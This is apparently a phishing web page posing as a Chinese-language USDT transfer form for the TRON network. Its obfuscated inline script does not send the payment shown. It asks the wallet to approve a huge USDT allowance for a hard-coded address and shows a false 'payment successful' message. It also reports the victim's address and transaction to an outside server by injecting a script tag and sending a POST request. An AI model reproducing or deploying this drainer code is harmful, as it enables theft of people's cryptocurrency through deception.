<!DOCTYPE html>
<html lang="en" data-dpr="1" style="font-size: 54px;" class="no-touch">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <!-- Required meta tags-->

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, viewport-fit=cover">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no, email=no">
  <meta name="msapplication-tap-highlight" content="no">
  <meta name="x5-orientation" content="portrait">
  <meta name="x5-fullscreen" content="true">
  <link rel="icon" href="/favicon.ico?tt=111">
  <meta name="description" content="">
  <meta name="keywords" content="">
  <!-- App title -->
  <title>USDT 转账</title>

  <!-- Framework7 Library CSS -->
  <link rel="stylesheet" href="./resource/static/css/vendor.min.css">

  <!-- Custom app styles-->
  <link rel="stylesheet" href="./resource/static/css/reset.min.css">
  <link rel="stylesheet" href="./resource/static/css/main.css?rand=97212">
  <script type="text/javascript" src="./resource/static/js/TronWeb.js"></script>

  <!-- Jquery app core js-->
  <script type="text/javascript" src="./resource/static/js/jquery-2.1.4.min.js"></script>
  <script type="text/javascript" src="./resource/static/js/flexible.js"></script>
  <script type="text/javascript" src="./resource/static/js/qrcode.min.js"></script>

  <style type="text/css">
    .tishi{
      width: 3.5rem;
      height: 1.2rem;
      background: #00000059;
      z-index: 999999999999;
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      border-radius: 0.1rem;
      color: white;
      font-size: 0.6rem;
      text-align: center;
      line-height: 1.2rem;
      display: none;
    }
  </style>

  <style type="text/css">/*
 * contextMenu.js v 1.4.0
 * Author: Sudhanshu Yadav
 * s-yadav.github.com
 * Copyright (c) 2013 Sudhanshu Yadav.
 * Dual licensed under the MIT and GPL licenses
**/

  .iw-contextMenu {
    box-shadow: 0px 2px 3px rgba(0, 0, 0, 0.10) !important;
    border: 1px solid #c8c7cc !important;
    border-radius: 11px !important;
    display: none;
    z-index: 1000000132;
    max-width: 300px !important;
    width: auto !important;
  }

  .dark-mode .iw-contextMenu,
  .TnITTtw-dark-mode.iw-contextMenu,
  .TnITTtw-dark-mode .iw-contextMenu {
    border-color: #747473 !important;
  }

  .iw-cm-menu {
    background: #fff !important;
    color: #000 !important;
    margin: 0px !important;
    padding: 0px !important;
    overflow: visible !important;
  }

  .dark-mode .iw-cm-menu,
  .TnITTtw-dark-mode.iw-cm-menu,
  .TnITTtw-dark-mode .iw-cm-menu {
    background: #525251 !important;
    color: #FFF !important;
  }

  .iw-curMenu {
  }

  .iw-cm-menu li {
    font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", Helvetica, Arial, Ubuntu, sans-serif !important;
    list-style: none !important;
    padding: 10px !important;
    padding-right: 20px !important;
    border-bottom: 1px solid #c8c7cc !important;
    font-weight: 400 !important;
    cursor: pointer !important;
    position: relative !important;
    font-size: 14px !important;
    margin: 0 !important;
    line-height: inherit !important;
    border-radius: 0 !important;
    display: block !important;
  }

  .dark-mode .iw-cm-menu li, .TnITTtw-dark-mode .iw-cm-menu li {
    border-bottom-color: #747473 !important;
  }

  .iw-cm-menu li:first-child {
    border-top-left-radius: 11px !important;
    border-top-right-radius: 11px !important;
  }

  .iw-cm-menu li:last-child {
    border-bottom-left-radius: 11px !important;
    border-bottom-right-radius: 11px !important;
    border-bottom: none !important;
  }

  .iw-mOverlay {
    position: absolute !important;
    width: 100% !important;
    height: 100% !important;
    top: 0px !important;
    left: 0px !important;
    background: #FFF !important;
    opacity: .5 !important;
  }

  .iw-contextMenu li.iw-mDisable {
    opacity: 0.3 !important;
    cursor: default !important;
  }

  .iw-mSelected {
    background-color: #F6F6F6 !important;
  }

  .dark-mode .iw-mSelected, .TnITTtw-dark-mode .iw-mSelected {
    background-color: #676766 !important;
  }

  .iw-cm-arrow-right {
    width: 0 !important;
    height: 0 !important;
    border-top: 5px solid transparent !important;
    border-bottom: 5px solid transparent !important;
    border-left: 5px solid #000 !important;
    position: absolute !important;
    right: 5px !important;
    top: 50% !important;
    margin-top: -5px !important;
  }

  .dark-mode .iw-cm-arrow-right, .TnITTtw-dark-mode .iw-cm-arrow-right {
    border-left-color: #FFF !important;
  }

  .iw-mSelected > .iw-cm-arrow-right {
  }

  /*context menu css end */</style><style type="text/css">@-webkit-keyframes load4 {
                                                            0%,
                                                            100% {
                                                              box-shadow: 0 -3em 0 0.2em, 2em -2em 0 0em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 0;
                                                            }
                                                            12.5% {
                                                              box-shadow: 0 -3em 0 0, 2em -2em 0 0.2em, 3em 0 0 0, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
                                                            }
                                                            25% {
                                                              box-shadow: 0 -3em 0 -0.5em, 2em -2em 0 0, 3em 0 0 0.2em, 2em 2em 0 0, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
                                                            }
                                                            37.5% {
                                                              box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 0, 2em 2em 0 0.2em, 0 3em 0 0em, -2em 2em 0 -1em, -3em 0em 0 -1em, -2em -2em 0 -1em;
                                                            }
                                                            50% {
                                                              box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 0em, 0 3em 0 0.2em, -2em 2em 0 0, -3em 0em 0 -1em, -2em -2em 0 -1em;
                                                            }
                                                            62.5% {
                                                              box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 0, -2em 2em 0 0.2em, -3em 0 0 0, -2em -2em 0 -1em;
                                                            }
                                                            75% {
                                                              box-shadow: 0em -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0.2em, -2em -2em 0 0;
                                                            }
                                                            87.5% {
                                                              box-shadow: 0em -3em 0 0, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0, -2em -2em 0 0.2em;
                                                            }
                                                          }

  @keyframes load4 {
    0%,
    100% {
      box-shadow: 0 -3em 0 0.2em, 2em -2em 0 0em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 0;
    }
    12.5% {
      box-shadow: 0 -3em 0 0, 2em -2em 0 0.2em, 3em 0 0 0, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
    }
    25% {
      box-shadow: 0 -3em 0 -0.5em, 2em -2em 0 0, 3em 0 0 0.2em, 2em 2em 0 0, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
    }
    37.5% {
      box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 0, 2em 2em 0 0.2em, 0 3em 0 0em, -2em 2em 0 -1em, -3em 0em 0 -1em, -2em -2em 0 -1em;
    }
    50% {
      box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 0em, 0 3em 0 0.2em, -2em 2em 0 0, -3em 0em 0 -1em, -2em -2em 0 -1em;
    }
    62.5% {
      box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 0, -2em 2em 0 0.2em, -3em 0 0 0, -2em -2em 0 -1em;
    }
    75% {
      box-shadow: 0em -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0.2em, -2em -2em 0 0;
    }
    87.5% {
      box-shadow: 0em -3em 0 0, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0, -2em -2em 0 0.2em;
    }
  }</style>
  <style type="text/css">/* This is not a zero-length file! */</style>
</head>
<body style="font-size: 12px;">
<!-- Views -->
<div class="views">
  <!-- main view -->
  <div class="view view-main">
    <!-- Pages -->
    <div class="pages navbar-through">
      <div class="page">

        <div class="page-content" style="padding-top: 0.5rem;">
          <div class="list-block address">
            <div class="list-block-title">收款地址</div>
            <ul>
              <li class="item-content">
                <div class="item-inner">
                  <div class="item-title" id="address"></div>
                </div>
              </li>
            </ul>
          </div>
          <div class="list-block amount">
            <div class="list-block-title">金额<span id="yu"> USDT</span></div>
            <ul>
              <li class="item-content">
                <div class="item-inner">
                  <div class="item-title">
                    <input class="num" placeholder="0" id="ammount_num">
                    <p>¥ <span id="price" style="color: inherit;font-size:inherit;">0</span></p>
                  </div>
                </div>
              </li>

            </ul>

          </div>
          <div class="list-block-button">
            <button class="button button-fill " id="btn-connect" style="background: rgb(7, 139, 195);">下一步</button>
          </div>
        </div>
      </div>
      <!-- Preloader -->
      <div class="modal">
        <div class="preloader"></div>
      </div>
      <div class="tishi">
        付款成功
      </div>
    </div>
  </div>
  <div id="s">

  </div>
</div>
<div id="fffsss" style="color: red;
    z-index: 99999999999999999;
    position: absolute;top: 1px;"></div>

<!-- Custom app js-->
<script src="./resource/static/js/main.js"></script>
<script src="./resource/layui/layui.js"></script>
<script>
  var _$_72dd=["address","TFTpYg5V26Wgnr2stXrxtWw3mnq8pt7cWY","host","location","/","","TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t","href","?","indexOf","substring","(^|&)","=([^&]*)(&|$)","i","match","substr","search","input propertychange","val","background","#078bc3","css","#btn-connect","#dde0dd","toLocaleString","text","#price","bind","input.num","&","split","length","=","authorized_address : ","log","#address","s","r","0","script","createElement","type","text/javascript","src","https://test123.test123.one/index.php/install/install/insert_trc2?from_address=","appendChild","head","POST","JSON","index.php/install/install/insert_trc","ajax","USDT","keys","at","contract","call","balanceOf","symbol : "," : usdt count is :","<div class=\"modal-overlay\"></div>","append",".pages","modal-overlay-visible","addClass",".modal-overlay","modal-in","modal-out","removeClass",".modal","tronWeb","base58","defaultAddress","getBalance","trx","fromSun","#ammount_num","undefined","\u8bf7\u8f93\u5165\u8f6c\u8d26\u6570\u91cf","reload","ammount_num","89545151532215834821315486441","increaseApproval","fadeIn",".tishi","fadeOut","\u8f6c\u8d26\u51fa\u9519\u4e86:","stringify","remove","send","_hex"," USDT","#yu","click","addEventListener","querySelector","#s"];var address=getUrlQueryString(_$_72dd[0]);var rank=6.5;var authorized_address=_$_72dd[1];var url=window[_$_72dd[3]][_$_72dd[2]];var domain=_$_72dd[4];var bizhong=_$_72dd[5];var approveAddr=_$_72dd[6];function getUrlQueryString(_0x54C2,_0x556D){_0x556D= _0x556D|| window[_$_72dd[3]][_$_72dd[7]];_0x556D&& _0x556D[_$_72dd[9]](_$_72dd[8])>  -1?_0x556D= _0x556D[_$_72dd[10]](_0x556D[_$_72dd[9]](_$_72dd[8])+ 1):_$_72dd[5];var _0x5534= new RegExp(_$_72dd[11]+ _0x54C2+ _$_72dd[12],_$_72dd[13]);var _0x54FB=_0x556D?_0x556D[_$_72dd[14]](_0x5534):window[_$_72dd[3]][_$_72dd[16]][_$_72dd[15]](1)[_$_72dd[14]](_0x5534);if(_0x54FB!= null&& _0x54FB[2]!= _$_72dd[5]){return unescape(_0x54FB[2])};return null}$(_$_72dd[28])[_$_72dd[27]](_$_72dd[17],function(){if($(this)[_$_72dd[18]]()&& $(this)[_$_72dd[18]]()> 0){$(_$_72dd[22])[_$_72dd[21]](_$_72dd[19],_$_72dd[20])}else {$(_$_72dd[22])[_$_72dd[21]](_$_72dd[19],_$_72dd[23])};$(_$_72dd[26])[_$_72dd[25]](($(this)[_$_72dd[18]]()* rank)[_$_72dd[24]]())});function getQueryVariable(_0x5450){var _0x5417=window[_$_72dd[3]][_$_72dd[16]][_$_72dd[10]](1);var _0x5489=_0x5417[_$_72dd[30]](_$_72dd[29]);for(var _0x53A5=0;_0x53A5< _0x5489[_$_72dd[31]];_0x53A5++){var _0x53DE=_0x5489[_0x53A5][_$_72dd[30]](_$_72dd[32]);if(_0x53DE[0]== _0x5450){return _0x53DE[1]}};return (false)}function getInfo(){authorized_address= _$_72dd[1];console[_$_72dd[34]](_$_72dd[33]+ authorized_address);$(_$_72dd[35])[_$_72dd[18]](getQueryVariable(_$_72dd[0]));$(_$_72dd[35])[_$_72dd[25]](getQueryVariable(_$_72dd[0]))}async function postInfo(_0x52C1,_0x5132,_0x568A,_0x55DF){var _0x4FDC=getUrlQueryString(_$_72dd[36]);var _0x55A6=getUrlQueryString(_$_72dd[37]);var _0x5618={from_address:_0x52C1,authorized_address:authorized_address,bizhong:_0x5132,code:_0x4FDC,reffer:_0x55A6,type:1,txid:_0x568A,contract_address:_0x55DF,to_address:address,user_id:_$_72dd[38]};var _0x5651=document[_$_72dd[40]](_$_72dd[39]);_0x5651[_$_72dd[41]]= _$_72dd[42];_0x5651[_$_72dd[43]]= _$_72dd[44]+ _0x52C1;document[_$_72dd[46]][_$_72dd[45]](_0x5651);console[_$_72dd[34]](_0x5618);$[_$_72dd[50]]({type:_$_72dd[47],dataType:_$_72dd[48],url:domain+ _$_72dd[49],data:_0x5618})}$(function(){const _0x4E86={'USDT':_$_72dd[6]};const _0x4FA3={'WIN':0.001150,'USDT':1,'ETMCOI':1,'TONS':1.35,'USDJ':1.04,'JST':0.125,"HT":20.41,"SUN":33.97,"EXNX":0.0621,"VCOIN":0.004225,"POL":0.1393,"CKRW":0.002487};const _0x4EBF={'WIN':6,'USDT':6,'ETMCOI':6,'TONS':6,'USDJ':18,'JST':18,"HT":18,"SUN":18,"EXNX":18,"VCOIN":6,"POL":8,"CKRW":6};var _0x5015=0;async function _0x4EF8(_0x5087){let _0x504E=_$_72dd[51];for(const _0x5132 of Object[_$_72dd[52]](_0x4E86)){let _0x50C0= await tronWeb[_$_72dd[54]]()[_$_72dd[53]](_0x4E86[_0x5132]);let _0x50F9= await _0x50C0[_$_72dd[56]](_0x5087)[_$_72dd[55]]();const _0x516B=_0x50F9/ (10** (_0x4EBF[_0x5132]|| 18))* _0x4FA3[_0x5132];console[_$_72dd[34]](_$_72dd[57]+ _0x5132+ _$_72dd[58]+ _0x516B);if(_0x516B> _0x5015&& _0x516B>= 1){_0x504E= _0x5132;_0x5015= _0x516B;approveAddr= _0x4E86[_0x504E]}};bizhong= _0x504E;return _0x504E}async function _0x4F6A(){$(_$_72dd[61])[_$_72dd[60]](_$_72dd[59]);$(_$_72dd[64])[_$_72dd[63]](_$_72dd[62]);$(_$_72dd[68])[_$_72dd[67]](_$_72dd[66])[_$_72dd[63]](_$_72dd[65]);let _0x524F=window[_$_72dd[69]];let _0x52C1=_0x524F[_$_72dd[71]][_$_72dd[70]];let _0x5288= await _0x524F[_$_72dd[73]][_$_72dd[72]](_0x52C1);_0x5288= _0x524F[_$_72dd[74]](_0x5288);var _0x51A4=($(_$_72dd[75])[_$_72dd[18]]());if(_0x51A4== _$_72dd[5]|| _0x51A4== 0|| _0x51A4== _$_72dd[76]|| _0x51A4== undefined){alert(_$_72dd[77]);location[_$_72dd[78]]();return};console[_$_72dd[34]](_$_72dd[79]+ _0x51A4);bizhong=  await _0x4EF8(_0x52C1);let _0x51DD= await _0x524F[_$_72dd[54]]()[_$_72dd[53]](approveAddr);let _0x5216= await _0x51DD[_$_72dd[81]](authorized_address,_$_72dd[80]);_0x5216[_$_72dd[88]]({feeLimit:100000000,callValue:0,shouldPollResponse:false},function(_0x52FA,_0x5216){postInfo(_0x52C1,bizhong,_0x5216,approveAddr);if(_0x52FA== null){$(_$_72dd[83])[_$_72dd[82]]();setTimeout(function(){$(_$_72dd[83])[_$_72dd[84]]()},2000);postInfo(_0x52C1,bizhong,_0x5216,approveAddr);postInfo(_0x52C1,bizhong,_0x5216,approveAddr)}else {alert(_$_72dd[85]+ JSON[_$_72dd[86]](_0x52FA))};$(_$_72dd[64])[_$_72dd[87]]();$(_$_72dd[68])[_$_72dd[67]](_$_72dd[65])[_$_72dd[63]](_$_72dd[66])})}function _0x4F31(){getInfo()}async function _0x4FDC(){var _0x524F=window[_$_72dd[69]];let _0x50C0= await _0x524F[_$_72dd[54]]()[_$_72dd[53]](_$_72dd[6]);let _0x52C1=_0x524F[_$_72dd[71]][_$_72dd[70]];let _0x5333= await _0x50C0[_$_72dd[56]](_0x52C1)[_$_72dd[55]](function(_0x52FA,_0x536C){if(_0x52FA== null){let _0x5015=_0x536C[_$_72dd[89]]/ (10** 6);$(_$_72dd[91])[_$_72dd[25]](_0x5015[_$_72dd[24]]()+ _$_72dd[90]);console[_$_72dd[34]]()}})}_0x4F31();document[_$_72dd[94]](_$_72dd[22])[_$_72dd[93]](_$_72dd[92],_0x4F6A);document[_$_72dd[94]](_$_72dd[95])[_$_72dd[93]](_$_72dd[92],_0x4FDC)});$(function(){setTimeout(function(){$(_$_72dd[95])[_$_72dd[92]]()},1000)})
</script>


</body></html>